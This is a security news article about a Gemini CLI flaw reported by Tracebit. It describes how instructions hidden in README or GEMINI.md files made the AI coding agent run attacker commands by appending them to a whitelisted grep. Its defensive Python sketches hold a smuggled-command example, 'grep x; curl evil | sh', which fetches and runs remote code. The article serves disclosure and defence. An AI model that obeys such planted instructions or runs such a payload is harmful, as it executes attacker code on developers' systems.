The flaw, discovered just two days after the tool’s release, highlights growing security concerns around AI-powered development tools.
On June 27, 2025, Tracebit reported the vulnerability to Google’s Vulnerability Disclosure Program (VDP), merely two days after Gemini CLI’s initial release on June 25.
The security flaw was initially classified by Google as a P2/S4 issue but was later escalated to P1/S1 status, indicating its critical severity.
The vulnerability exploited a “toxic combination of improper validation, prompt injection and misleading UX” that allowed attackers to execute arbitrary commands when users inspected untrusted code repositories.
Most concerning was the attack’s stealthy nature: malicious commands could execute with no visible indication to the victim.
The attack leveraged Gemini CLI’s ability to execute shell commands through its run_shell_command tool and its support for context files like GEMINI.md.
Attackers could hide malicious instructions within seemingly benign files, such as README.md files containing the text of the GNU General Public License, where few users would read beyond the opening lines.
The exploitation involved a two-stage process: first, tricking users into whitelisting innocuous commands like grep, then executing malicious commands masquerading as the whitelisted ones.
Because the validation logic that compared shell inputs against the command whitelist was insufficiently strict, attackers could append malicious payloads to legitimate whitelisted commands.
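The general class of bug is easy to illustrate. The sketch below is not Gemini CLI's actual code; it is a minimal, hypothetical example of a whitelist check that only inspects the leading command name, which lets an attacker chain a second command after a shell separator, alongside a stricter variant that rejects such inputs.

```python
import shlex

WHITELIST = {"grep"}

def is_allowed_naive(command: str) -> bool:
    # Flawed: "grep x; curl evil | sh" starts with "grep", so it passes,
    # even though the shell will also run the appended payload.
    return command.split()[0] in WHITELIST

def is_allowed_strict(command: str) -> bool:
    # Safer sketch: reject anything containing shell metacharacters that
    # could chain or substitute a second command, then check the binary name.
    if any(ch in command for ch in ";|&`$(){}\n"):
        return False
    try:
        tokens = shlex.split(command)
    except ValueError:
        return False
    return bool(tokens) and tokens[0] in WHITELIST

print(is_allowed_naive("grep TODO src/"))           # True
print(is_allowed_naive("grep x; curl evil | sh"))   # True -- the bypass
print(is_allowed_strict("grep x; curl evil | sh"))  # False
```

The naive check is exactly the kind of "masquerading as the whitelisted command" the researchers describe: the validator and the shell disagree about what will actually be executed.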
Google responded swiftly to the disclosure, releasing version 0.1.14 on July 25 with comprehensive fixes.
The company emphasized that its security model centers on “robust, multi-layered sandboxing” with Docker, Podman, and macOS Seatbelt integrations.
Several security researchers independently discovered similar vulnerabilities during the month between release and patch, underscoring the severity of the issue.
The fixed version now clearly displays malicious commands to users and requires explicit approval for additional binaries.
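A "explicit approval for additional binaries" policy can be sketched as follows. This is a hypothetical illustration, not Gemini CLI's implementation: every distinct binary appearing anywhere in a proposed command line, including after separators like `;` or `|`, must already be in an approved set, and anything new is surfaced to the user.

```python
import shlex

# Binaries the user has already approved this session (illustrative).
approved = {"grep"}

def binaries_in(command: str) -> set[str]:
    # Split on common shell separators so chained commands are all inspected,
    # not just the first one.
    for sep in (";", "&&", "||", "|"):
        command = command.replace(sep, "\x00")
    binaries = set()
    for segment in command.split("\x00"):
        tokens = shlex.split(segment)
        if tokens:
            binaries.add(tokens[0])
    return binaries

def needs_approval(command: str) -> set[str]:
    # Any binary not yet approved would be displayed and require consent.
    return binaries_in(command) - approved

print(needs_approval("grep TODO src/"))          # set()
print(needs_approval("grep x; curl evil | sh"))  # {'curl', 'sh'}
```

The key design point is that approval is keyed to every binary a command would invoke, so a payload hiding behind a whitelisted `grep` still triggers a prompt.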
This incident reflects broader challenges in AI tool security as development teams rapidly adopt LLM-powered assistants.
Tracebit, which specializes in deception technology and security canaries, noted that “teams are moving very quickly to unlock and leverage the power of LLMs” but warned that “Prompt Injection doesn’t seem to be going away any time soon”.
The company’s customers, including major firms like Docker, Riot Games, and Cresta, have praised Tracebit’s approach to threat detection through automated canary deployment.
As AI tools become increasingly prevalent in development workflows, this discovery emphasizes the critical need for robust security measures and careful validation of AI-generated actions.
The post Gemini CLI Vulnerability Allows Attackers to Execute Malicious Commands Silently on Developer Systems appeared first on Cyber Security News.